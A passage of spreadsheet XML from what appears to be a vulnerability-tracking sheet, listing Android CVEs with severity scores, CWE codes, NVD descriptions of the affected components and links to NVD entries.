requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t></is></c><c r="S747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18445</t></is></c></row><row r="748"><c r="A748" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B748" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C748" s="5" t="inlineStr"><is><t>CVE-2026-28572</t></is></c><c r="D748" s="5" t="n"><v>7.8</v></c><c r="E748" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F748" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G748" s="5" t="inlineStr" /><c r="H748" s="5" t="n"><v>0.001</v></c><c r="I748" s="5" t="inlineStr" /><c r="J748" s="5" t="inlineStr" /><c r="K748" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L748" s="5" t="inlineStr" /><c r="M748" s="5" t="inlineStr" /><c r="N748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O748" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P748" s="5" t="inlineStr" /><c r="Q748" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R748" s="5" t="inlineStr"><is><t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t></is></c></row><row r="749"><c r="A749" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B749" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C749" s="5" t="inlineStr"><is><t>CVE-2026-28583</t></is></c><c r="D749" s="5" t="n"><v>7.8</v></c><c r="E749" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F749" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G749" s="5" t="inlineStr" /><c r="H749" s="5" t="n"><v>0.001</v></c><c r="I749" s="5" t="inlineStr" /><c r="J749" s="5" t="inlineStr" /><c r="K749" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L749" s="5" t="inlineStr" /><c r="M749" s="5" t="inlineStr" /><c r="N749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O749" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P749" s="5" t="inlineStr" /><c r="Q749" s="5" t="inlineStr"><is><t>CWE-693, CWE-787</t></is></c><c r="R749" s="5" t="inlineStr"><is><t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t></is></c></row><row r="750"><c r="A750" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C750" s="5" t="inlineStr"><is><t>CVE-2026-28590</t></is></c><c r="D750" s="5" t="n"><v>7.8</v></c><c r="E750" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F750" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G750" s="5" t="inlineStr" /><c r="H750" s="5" t="n"><v>0.001</v></c><c r="I750" s="5" t="inlineStr" /><c r="J750" s="5" t="inlineStr" /><c r="K750" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L750" s="5" t="inlineStr" /><c r="M750" s="5" t="inlineStr" /><c r="N750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P750" s="5" t="inlineStr" /><c r="Q750" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R750" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t></is></c></row><row r="751"><c r="A751" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C751" s="5" t="inlineStr"><is><t>CVE-2026-28593</t></is></c><c r="D751" s="5" t="n"><v>7.8</v></c><c r="E751" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F751" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G751" s="5" t="inlineStr" /><c r="H751" s="5" t="n"><v>0.001</v></c><c r="I751" s="5" t="inlineStr" /><c r="J751" s="5" t="inlineStr" /><c r="K751" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L751" s="5" t="inlineStr" /><c r="M751" s="5" t="inlineStr" /><c r="N751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P751" s="5" t="inlineStr" /><c r="Q751" s="5" t="inlineStr"><is><t>CWE-356</t></is></c><c r="R751" s="5" t="inlineStr"><is><t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t></is></c></row><row r="752"><c r="A752" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C752" s="5" t="inlineStr"><is><t>CVE-2026-28594</t></is></c><c r="D752" s="5" t="n"><v>7.8</v></c><c r="E752" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F752" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G752" s="5" t="inlineStr" /><c r="H752" s="5" t="n"><v>0.001</v></c><c r="I752" s="5" t="inlineStr" /><c r="J752" s="5" t="inlineStr" /><c r="K752" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L752" s="5" t="inlineStr" /><c r="M752" s="5" t="inlineStr" /><c r="N752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P752" s="5" t="inlineStr" /><c r="Q752" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R752" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t></is></c></row><row r="753"><c r="A753" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C753" s="5" t="inlineStr"><is><t>CVE-2026-28599</t></is></c><c r="D753" s="5" t="n"><v>7.8</v></c><c r="E753" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F753" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G753" s="5" t="inlineStr" /><c r="H753" s="5" t="n"><v>0.001</v></c><c r="I753" s="5" t="inlineStr" /><c r="J753" s="5" t="inlineStr" /><c r="K753" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L753" s="5" t="inlineStr" /><c r="M753" s="5" t="inlineStr" /><c r="N753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P753" s="5" t="inlineStr" /><c r="Q753" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R753" s="5" t="inlineStr"><is><t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t></is></c></row><row r="754"><c r="A754" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B754" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C754" s="5" t="inlineStr"><is><t>CVE-2026-28600</t></is></c><c r="D754" s="5" t="n"><v>7.8</v></c><c r="E754" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F754" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G754" s="5" t="inlineStr" /><c r="H754" s="5" t="n"><v>0.001</v></c><c r="I754" s="5" t="inlineStr" /><c r="J754" s="5" t="inlineStr" /><c r="K754" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L754" s="5" t="inlineStr" /><c r="M754" s="5" t="inlineStr" /><c r="N754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O754" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P754" s="5" t="inlineStr" /><c r="Q754" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R754" s="5" t="inlineStr"><is><t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t></is></c></row><row r="755"><c r="A755" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B755" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C755" s="5" t="inlineStr"><is><t>CVE-2026-28602</t></is></c><c r="D755" s="5" t="n"><v>7.8</v></c><c r="E755" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F755" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G755" s="5" t="inlineStr" /><c r="H755" s="5" t="n"><v>0.001</v></c><c r="I755" s="5" t="inlineStr" /><c r="J755" s="5" t="inlineStr" /><c r="K755" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L755" s="5" t="inlineStr" /><c r="M755" s="5" t="inlineStr" /><c r="N755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O755" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P755" s="5" t="inlineStr" /><c r="Q755" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R755" s="5" t="inlineStr"><is><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is></c><c r="S755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t></is></c></row><row r="756"><c r="A756" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B756" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C756" s="5" t="inlineStr"><is><t>CVE-2026-28603</t></is></c><c r="D756" s="5" t="n"><v>7.8</v></c><c r="E756" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F756" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G756" s="5" t="inlineStr" /><c r="H756" s="5" t="n"><v>0.001</v></c><c r="I756" s="5" t="inlineStr" /><c r="J756" s="5" t="inlineStr" /><c r="K756" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L756" s="5" t="inlineStr" /><c r="M756" s="5" t="inlineStr" /><c r="N756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O756" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P756" s="5" t="inlineStr" /><c r="Q756" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R756" s="5" t="inlineStr"><is><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is></c><c r="S756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t></is></c></row><row r="757"><c r="A757" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B757" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C757" s="5" t="inlineStr"><is><t>CVE-2026-28607</t></is></c><c r="D757" s="5" t="n"><v>7.8</v></c><c r="E757" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F757" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G757" s="5" t="inlineStr" /><c r="H757" s="5" t="n"><v>0.001</v></c><c r="I757" s="5" t="inlineStr" /><c r="J757" s="5" t="inlineStr" /><c r="K757" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L757" s="5" t="inlineStr" /><c r="M757" s="5" t="inlineStr" /><c r="N757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O757" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P757" s="5" t="inlineStr" /><c r="Q757" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R757" s="5" t="inlineStr"><is><t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t></is></c></row><row r="758"><c r="A758" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C758" s="5" t="inlineStr"><is><t>CVE-2026-28611</t></is></c><c r="D758" s="5" t="n"><v>7.8</v></c><c r="E758" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F758" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G758" s="5" t="inlineStr" /><c r="H758" s="5" t="n"><v>0.001</v></c><c r="I758" s="5" t="inlineStr" /><c r="J758" s="5" t="inlineStr" /><c r="K758" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L758" s="5" t="inlineStr" /><c r="M758" s="5" t="inlineStr" /><c r="N758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P758" s="5" t="inlineStr" /><c r="Q758" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R758" s="5" t="inlineStr"><is><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is></c><c r="S758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t></is></c></row><row r="759"><c r="A759" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B759" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C759" s="5" t="inlineStr"><is><t>CVE-2026-28612</t></is></c><c r="D759" s="5" t="n"><v>7.8</v></c><c r="E759" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F759" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G759" s="5" t="inlineStr" /><c r="H759" s="5" t="n"><v>0.001</v></c><c r="I759" s="5" t="inlineStr" /><c r="J759" s="5" t="inlineStr" /><c r="K759" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L759" s="5" t="inlineStr" /><c r="M759" s="5" t="inlineStr" /><c r="N759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O759" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P759" s="5" t="inlineStr" /><c r="Q759" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R759" s="5" t="inlineStr"><is><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is></c><c r="S759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t></is></c></row><row r="760"><c r="A760" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B760" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C760" s="5" t="inlineStr"><is><t>CVE-2026-28614</t></is></c><c r="D760" s="5" t="n"><v>7.8</v></c><c r="E760" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F760" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G760" s="5" t="inlineStr" /><c r="H760" s="5" t="n"><v>0.001</v></c><c r="I760" s="5" t="inlineStr" /><c r="J760" s="5" t="inlineStr" /><c r="K760" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L760" s="5" t="inlineStr" /><c r="M760" s="5" t="inlineStr" /><c r="N760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O760" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P760" s="5" t="inlineStr" /><c r="Q760" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R760" s="5" t="inlineStr"><is><t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t></is></c></row><row r="761"><c r="A761" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B761" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C761" s="5" t="inlineStr"><is><t>CVE-2026-28616</t></is></c><c r="D761" s="5" t="n"><v>7.8</v></c><c r="E761" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F761" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G761" s="5" t="inlineStr" /><c r="H761" s="5" t="n"><v>0.001</v></c><c r="I761" s="5" t="inlineStr" /><c r="J761" s="5" t="inlineStr" /><c r="K761" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L761" s="5" t="inlineStr" /><c r="M761" s="5" t="inlineStr" /><c r="N761" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P761" s="5" t="inlineStr" /><c r="Q761" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R761" s="5" t="inlineStr"><is><t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t></is></c></row><row r="762"><c r="A762" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C762" s="5" t="inlineStr"><is><t>CVE-2026-28620</t></is></c><c r="D762" s="5" t="n"><v>7.8</v></c><c r="E762" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F762" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G762" s="5" t="inlineStr" /><c r="H762" s="5" t="n"><v>0.001</v></c><c r="I762" s="5" t="inlineStr" /><c r="J762" s="5" t="inlineStr" /><c r="K762" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L762" s="5" t="inlineStr" /><c r="M762" s="5" t="inlineStr" /><c r="N762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P762" s="5" t="inlineStr" /><c r="Q762" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R762" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t></is></c></row><row r="763"><c r="A763" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B763" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C763" s="5" t="inlineStr"><is><t>CVE-2026-28624</t></is></c><c r="D763" s="5" t="n"><v>7.8</v></c><c r="E763" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F763" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G763" s="5" t="inlineStr" /><c r="H763" s="5" t="n"><v>0.001</v></c><c r="I763" s="5" t="inlineStr" /><c r="J763" s="5" t="inlineStr" /><c r="K763" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L763" s="5" t="inlineStr" /><c r="M763" s="5" t="inlineStr" /><c r="N763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O763" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P763" s="5" t="inlineStr" /><c r="Q763" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R763" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t></is></c></row><row r="764"><c r="A764" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B764" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C764" s="5" t="inlineStr"><is><t>CVE-2026-28631</t></is></c><c r="D764" s="5" t="n"><v>7.8</v></c><c r="E764" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F764" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G764" s="5" t="inlineStr" /><c r="H764" s="5" t="n"><v>0.001</v></c><c r="I764" s="5" t="inlineStr" /><c r="J764" s="5" t="inlineStr" /><c r="K764" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L764" s="5" t="inlineStr" /><c r="M764" s="5" t="inlineStr" /><c r="N764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O764" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P764" s="5" t="inlineStr" /><c r="Q764" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R764" s="5" t="inlineStr"><is><t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t></is></c></row><row r="765"><c r="A765" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B765" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C765" s="5" t="inlineStr"><is><t>CVE-2026-28634</t></is></c><c r="D765" s="5" t="n"><v>7.8</v></c><c r="E765" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F765" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G765" s="5" t="inlineStr" /><c r="H765" s="5" t="n"><v>0.001</v></c><c r="I765" s="5" t="inlineStr" /><c r="J765" s="5" t="inlineStr" /><c r="K765" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L765" s="5" t="inlineStr" /><c r="M765" s="5" t="inlineStr" /><c r="N765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O765" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P765" s="5" t="inlineStr" /><c r="Q765" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R765" s="5" t="inlineStr"><is><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is></c><c r="S765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t></is></c></row><row r="766"><c r="A766" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B766" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C766" s="5" t="inlineStr"><is><t>CVE-2026-28636</t></is></c><c r="D766" s="5" t="n"><v>7.8</v></c><c r="E766" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F766" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G766" s="5" t="inlineStr" /><c r="H766" s="5" t="n"><v>0.001</v></c><c r="I766" s="5" t="inlineStr" /><c r="J766" s="5" t="inlineStr" /><c r="K766" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L766" s="5" t="inlineStr" /><c r="M766" s="5" t="inlineStr" /><c r="N766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P766" s="5" t="inlineStr" /><c r="Q766" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R766" s="5" t="inlineStr"><is><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is></c><c r="S766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t></is></c></row><row r="767"><c r="A767" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B767" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C767" s="5" t="inlineStr"><is><t>CVE-2026-28639</t></is></c><c r="D767" s="5" t="n"><v>7.8</v></c><c r="E767" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F767" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G767" s="5" t="inlineStr" /><c r="H767" s="5" t="n"><v>0.001</v></c><c r="I767" s="5" t="inlineStr" /><c r="J767" s="5" t="inlineStr" /><c r="K767" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L767" s="5" t="inlineStr" /><c r="M767" s="5" t="inlineStr" /><c r="N767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O767" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P767" s="5" t="inlineStr" /><c r="Q767" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R767" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t></is></c></row><row r="768"><c r="A768" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C768" s="5" t="inlineStr"><is><t>CVE-2026-28642</t></is></c><c r="D768" s="5" t="n"><v>7.8</v></c><c r="E768" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F768" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G768" s="5" t="inlineStr" /><c r="H768" s="5" t="n"><v>0.001</v></c><c r="I768" s="5" t="inlineStr" /><c r="J768" s="5" t="inlineStr" /><c r="K768" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L768" s="5" t="inlineStr" /><c r="M768" s="5" t="inlineStr" /><c r="N768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P768" s="5" t="inlineStr" /><c r="Q768" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R768" s="5" t="inlineStr"><is><t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t></is></c></row><row r="769"><c r="A769" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B769" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C769" s="5" t="inlineStr"><is><t>CVE-2026-28644</t></is></c><c r="D769" s="5" t="n"><v>7.8</v></c><c r="E769" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F769" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G769" s="5" t="inlineStr" /><c r="H769" s="5" t="n"><v>0.001</v></c><c r="I769" s="5" t="inlineStr" /><c r="J769" s="5" t="inlineStr" /><c r="K769" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L769" s="5" t="inlineStr" /><c r="M769" s="5" t="inlineStr" /><c r="N769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O769" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P769" s="5" t="inlineStr" /><c r="Q769" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R769" s="5" t="inlineStr"><is><t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t></is></c></row><row r="770"><c r="A770" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B770" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C770" s="5" t="inlineStr"><is><t>CVE-2026-28650</t></is></c><c r="D770" s="5" t="n"><v>7.8</v></c><c r="E770" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F770" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G770" s="5" t="inlineStr" /><c r="H770" s="5" t="n"><v>0.001</v></c><c r="I770" s="5" t="inlineStr" /><c r="J770" s="5" t="inlineStr" /><c r="K770" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L770" s="5" t="inlineStr" /><c r="M770" s="5" t="inlineStr" /><c r="N770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O770" s="5" 